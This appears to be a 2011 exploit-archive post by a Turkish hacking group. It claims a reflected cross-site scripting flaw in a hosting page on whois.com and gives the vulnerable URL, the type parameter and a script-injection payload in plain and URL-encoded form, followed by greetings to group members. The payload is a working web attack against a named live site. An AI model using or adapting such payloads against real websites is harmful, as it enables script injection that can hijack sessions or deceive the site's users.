Whois.com suffers from a cross site scripting vulnerability.
e2ac630071eca8340daea335b449a6e12b37cda626e7da1fff0831dc9f413846
# Exploit Title: whois.com XSS
# Date: 26.11.2011 - 19.23
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php
-------------------------------------------------------------
https://domains.whois.com/hosting.php?type=
"><script>alert("DarkDevilZ / Mr.PaPaRoSSe")</script>
https://domains.whois.com/hosting.php?type=%22%3E%3Cscript%3Ealert%28%22DarkDevilZ%20/%20Mr.PaPaRoSSe%22%29%3C/script%3E
-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#